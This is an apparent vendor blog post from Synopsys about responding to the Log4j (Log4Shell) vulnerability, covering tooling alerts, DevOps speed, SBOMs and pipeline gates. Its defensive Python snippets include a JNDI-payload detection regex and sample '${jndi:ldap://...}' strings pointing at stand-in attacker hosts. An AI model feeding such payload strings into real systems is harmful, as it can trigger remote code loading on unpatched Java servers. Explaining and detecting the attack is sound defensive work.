The discovery of the Log4j vulnerability has DevOps teams working tirelessly to mitigate the issue. Here are six factors that should shape your organization's response now.
At midnight last Thursday, we experienced one of the most notable infosec events in years: a zero-day vulnerability was disclosed in Log4j, a popular logging library for Java. The exact origin and timeline are still being investigated, but it's important to note that this was not just a vulnerability announcement. The disclosure was rapidly followed by fully functional exploit code, and the exploit itself turned out to be trivial to execute.
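To see why the exploit is so trivial, consider the shape of the attack string: any attacker-controlled value that reaches a vulnerable logger, such as a User-Agent header containing a `${jndi:...}` lookup, can trigger remote class loading. The sketch below is a toy Python scanner for the obvious payload shape; the domain name is invented, and real payloads use obfuscations that defeat naive pattern matching, so treat this as illustration only.

```python
import re

# Toy pattern for the classic Log4Shell payload shape: a ${jndi:...} lookup.
# Real payloads use many obfuscations (e.g., nested ${lower:j}... tricks),
# so a simple regex like this is illustrative, not a real defense.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(value: str) -> bool:
    """Return True if the string contains an obvious JNDI lookup payload."""
    return bool(JNDI_LOOKUP.search(value))

# Any attacker-controlled field that ends up in a log line is a candidate:
user_agent = "${jndi:ldap://attacker.example/a}"   # hypothetical payload
print(looks_like_log4shell(user_agent))            # → True
print(looks_like_log4shell("Mozilla/5.0"))         # → False
```

The point is not the scanner itself but how low the bar is: the attacker needs only to get one such string logged anywhere in the application.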
Over 3 billion devices run Java, and because there are only a handful of logging libraries, many of them are likely to run Log4j. Worse still, many internet-exposed applications can be exploited by external users without authentication. And unlike some other notable open source vulnerabilities, such as the infamous Heartbleed or the recently disclosed Trojan Source, in this case no prior coordination took place "behind the scenes" to ensure that users had adequate time to plan their response.

Putting aside the deconstruction of the bug itself, here's why a seasoned CISO should have been able to sleep late and enjoy nothing more eventful than their regular Friday routine.
As aviation safety enthusiasts say, an incident or accident occurs when the holes in the Swiss cheese line up. That is to say, we have multiple layers of protections and controls that should stop the worst-case scenarios from manifesting. Known catastrophic events occur only when all those controls fail to perform. Cybersecurity is no different, and we’ve been talking about defense in depth forever, too.
Here are six factors that, when combined, should help mitigate the impact and protect the Friday of every CISO.
A vulnerability response is a combination of people, process, and technology. Software composition analysis tools help identify and track library usage. When a new vulnerability emerges, a Synopsys Black Duck® research team investigates the issue. This particular vulnerability was not assigned a detailed CVE entry until several hours after it was disclosed, but Synopsys analysts had already allocated a Black Duck Security Advisory (BDSA) number and pushed the notification out to Synopsys customers.
The next question is your ability to respond. Once Black Duck sends out an alert, security analysts on your team can see which applications are impacted. The developers who own those applications are notified automatically too, whether via Teams, Slack, a Jira ticket, or email, depending on how Black Duck alerts are configured. You then need the organizational machinery in place to roll out an update rapidly. This is where we must look at the DevOps capability itself.
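As a sketch of how that alert fan-out works, the snippet below routes a single advisory to the channel each owning team has configured. The application names, team names, channels, and advisory ID are all hypothetical; in a real deployment this mapping lives in the SCA tool's configuration, not in application code.

```python
# Hypothetical routing table: which team owns each application and where its
# alerts should land. All names here are invented for illustration.
ROUTES = {
    "payments-api": {"owner": "team-payments", "channel": "slack:#sec-alerts"},
    "web-frontend": {"owner": "team-web",      "channel": "jira:WEB"},
}

def route_advisory(advisory: str, affected_apps: list[str]) -> list[str]:
    """Fan one advisory out to every owning team's configured channel."""
    notifications = []
    for app in affected_apps:
        route = ROUTES.get(app)
        if route:  # apps with no route would fall back to a default queue
            notifications.append(
                f"{route['channel']}: {advisory} affects {app} ({route['owner']})"
            )
    return notifications

for line in route_advisory("BDSA-EXAMPLE-0001 (log4j-core)",
                           ["payments-api", "web-frontend"]):
    print(line)
```

The key design point is that ownership is resolved automatically, so the security team never has to work out by hand who should receive which notification.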
One of the key metrics from DevOps Research and Assessment (DORA), a cross-industry program to measure and benchmark organizational DevOps capabilities, is the speed at which a change can be pushed into production. According to DORA, elite performers can complete this cycle in less than an hour and deploy any change on demand. But only 26% of the 1,200 respondents surveyed in the latest State of DevOps Survey fall into the elite category. While this is still a large number of organizations, the next tier, high performers, takes between a day and a week to complete the cycle. These organizations respond less quickly, which means that slotting in an unplanned security patch is not a "business as usual" activity.
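A minimal sketch of how lead-time measurements map onto these tiers, using the thresholds cited above (elite under an hour, high performers between a day and a week); the cut-offs are approximations of the published bands, and everything between an hour and a week is bucketed as "high" here for simplicity.

```python
def dora_tier(lead_time_hours: float) -> str:
    """Classify a change's lead time into an approximate DORA tier.

    Thresholds follow the figures cited in the article: elite completes the
    change cycle in under an hour; high performers take up to a week.
    Anything slower is lumped together as "below high" in this sketch.
    """
    if lead_time_hours < 1:
        return "elite"
    if lead_time_hours <= 24 * 7:
        return "high"
    return "below high"

print(dora_tier(0.75))     # 45 minutes → elite
print(dora_tier(72))       # 3 days    → high
```

For a Log4j-style event, the practical question the metric answers is simple: can your organization ship a one-line dependency bump the same day, or does the fix have to wait for the next scheduled release?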
This significant gap between elite and high performers illustrates why maximizing the uptake of foundational DevOps practices benefits everyone, and it underlines why security teams must partner with development to ensure that the business is adequately equipped to respond, whether the fast fix addresses a security issue, a quality issue, or anything else.
Figure 1: Software delivery performance metrics chart from State of DevOps Survey
Finally, beyond scrambling to fix the underlying component, there are three reasons why you shouldn't be affected: good code hygiene, good network architecture, and confidence that centralized security and engineering teams have integrated appropriate security checks into CI/CD pipelines and provided actionable information to developers. Together, these protect you and help you avoid security, quality, and safety risks in every software delivery. Static code checkers, including Coverity®, can find log injection vulnerabilities, and with modern infrastructure-as-code configurations, automated analysis can catch overly permissive network rules.
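As a rough illustration of what a log injection mitigation looks like in practice, the sketch below neutralizes two classic hazards before a value reaches the logger: newline smuggling (forging extra log entries) and `${...}`-style lookup expansion. This is illustrative Python, not a substitute for a vetted output encoder or a patched logging library.

```python
def sanitize_for_log(value: str) -> str:
    """Neutralize common log-injection tricks in an untrusted string.

    Illustrative only: real mitigations belong in the logging layer
    (patched library, vetted encoder), not scattered across call sites.
    """
    # Escape CR/LF so an attacker cannot forge additional log entries.
    value = value.replace("\r", "\\r").replace("\n", "\\n")
    # Break the ${...} trigger sequence used by lookup-style expansions.
    return value.replace("${", "$\\{")

user = "alice\nERROR fake entry ${jndi:ldap://evil.example/a}"
print(sanitize_for_log(user))  # one line, no raw newline, no "${"
```

This is exactly the class of defect a static checker can flag automatically: any path where untrusted input flows into a log call without passing through a sanitizer.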
In a well-orchestrated AppSec program, determining whether your team or built-in automation ran the tools, and whether the findings were fixed, should take only a couple of clicks on an application security orchestration and correlation (ASOC) dashboard.
Furthermore, as we see increased adoption of SBOMs, championed recently by Executive Order 14028, software component information should flow more seamlessly between product vendors and their customers. Instead of calling every single supplier to confirm component information, the task now becomes a straightforward database search. Although users of software composition analysis products such as Black Duck already benefit from internal SBOM information for software that they develop in-house, we are on the cusp of broad SBOM adoption and distribution between organizations. Once established, this will be another powerful tool for mitigating and managing risk, and support more rapid response (perhaps even automated response) in these scenarios.
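To make that "database search" concrete, here is a minimal sketch of looking up a component in a CycloneDX-style SBOM fragment. The SBOM content below is invented for illustration, and real SBOM documents carry far more fields; only the component name and version matter for this lookup.

```python
import json

# A tiny CycloneDX-style SBOM fragment, invented for illustration.
sbom_json = """
{"components": [
  {"name": "log4j-core", "version": "2.14.1",
   "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
  {"name": "jackson-databind", "version": "2.13.0",
   "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.13.0"}
]}
"""

def find_component(sbom: dict, name: str) -> list[dict]:
    """Return every component entry in the SBOM matching the given name."""
    return [c for c in sbom.get("components", []) if c.get("name") == name]

hits = find_component(json.loads(sbom_json), "log4j-core")
for c in hits:
    print(f"{c['name']} {c['version']}")   # → log4j-core 2.14.1
```

With SBOMs flowing between vendors and customers, the same query runs across every product you consume rather than only the software you build yourself, which is what makes automated response plausible.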
Of course, talking about all these things that should have already happened is a bit like closing the proverbial stable door after the horse has bolted. It is important to highlight that security is not the job of any single person or department; for our mission to succeed, each of these activities must be federated out so that security becomes part of everybody's job. And for organizations to achieve success, a range of security activities must be woven into the culture of how IT systems are planned, constructed, and operated. Practices such as formulating nonfunctional security requirements and reviewing architecture at the design phase, for example, help identify what data an application should process and what security checks must be satisfied before software is released into production.
At modern organizations, the highly automated software delivery pipeline is programmed to fail if these prerequisite steps have not been completed, making it impossible to launch a product with such vulnerabilities or missing mitigations in the first place. In the future, SBOM information might become a means by which zero-trust architectures dynamically determine the level of trust and privilege with which software may execute, or whether it should be stopped from executing at all.
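A release gate of this kind can be sketched in a few lines: the build may be promoted only if every required security step has completed and passed. The step names below are hypothetical; a real pipeline encodes the same rule in its CI configuration rather than in application code.

```python
# Sketch of a release gate: refuse to promote a build unless every
# prerequisite security step has passed. Step names are hypothetical.
REQUIRED_GATES = ("sca_scan", "static_analysis", "security_review")

def may_release(results: dict[str, str]) -> bool:
    """True only when every required gate is present and marked 'passed'."""
    return all(results.get(gate) == "passed" for gate in REQUIRED_GATES)

build = {"sca_scan": "passed", "static_analysis": "passed",
         "security_review": "pending"}
print(may_release(build))   # → False (review still pending)

build["security_review"] = "passed"
print(may_release(build))   # → True
```

The deliberate choice here is fail-closed: a missing result blocks the release just as a failed one does, so an incomplete scan can never slip through as an implicit pass.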
The good news is that it is possible today to measure and benchmark organizational ability across all these critical areas, and to illuminate gaps and areas for improvement, using frameworks such as the Building Security In Maturity Model (BSIMM).
With this reassurance, Synopsys customers will have wrapped up their Friday on schedule and be ready to enjoy the weekend.
Michael White is the director of solution strategy within Synopsys' Software Integrity Group. During his time at Synopsys, he has worked with leading software and IT organizations around the world to build programs to manage software security, safety, and reliability risks.